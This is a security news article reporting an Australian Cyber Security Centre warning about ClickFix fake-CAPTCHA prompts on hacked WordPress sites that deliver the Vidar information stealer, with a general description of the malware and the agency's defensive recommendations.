ACSC warns of ClickFix attacks delivering Vidar Stealer via WordPress

The Australian Cyber Security Center has warned of an active malware campaign using fake CAPTCHA prompts on compromised WordPress sites to push the Vidar information-stealing malware onto Australian organisations and infrastructure targets.

The technique, known as ClickFix, presents visitors to hacked WordPress sites with a fake Cloudflare verification or browser CAPTCHA prompt. Users are told to copy a malicious PowerShell command and run it on their own system, according to an ACSC advisory.

“The ACSC has observed ClickFix-associated activity leveraging WordPress-hosted infrastructure to distribute the Vidar Stealer malware,” the agency said.

ClickFix works differently from traditional phishing. Instead of getting victims to click an email link or open an attachment, it asks them to execute code directly. That lets it bypass endpoint detection and email security gateways. Security researchers have documented ClickFix variants disguised as browser update prompts, reCAPTCHA checks and Cloudflare challenge pages.

Vidar Stealer launched as a malware-as-a-service offering in late 2018. It targets browser passwords, cookies, cryptocurrency wallets, autofill data and system information. After execution it deletes its own file and runs from system memory to limit forensic visibility. Command-and-control addresses are retrieved through dead-drop URLs on public services including Telegram bots and Steam profiles, a design that makes conventional takedowns difficult. The malware is sold on underground forums for a subscription fee.

The ACSC recommends organisations restrict PowerShell execution, apply application allow-listing, install WordPress security updates and remove unused themes and plugins. The advisory includes indicators of compromise.

WordPress administrators should audit installations for unauthorised changes, review user accounts with administrative privileges and keep core, plugin and theme software current. Compromised WordPress sites served as the initial infection vector, the ACSC said.

The warning is the latest in a series of ACSC alerts as ransomware and information-stealer campaigns increasingly target Australian organisations. The agency recently established a Cyber Incident Review Board under the Cyber Security Act 2024 to conduct no-fault post-mortems of major attacks. Organisations that detect compromise should report through ACSC channels and consider engaging incident response specialists.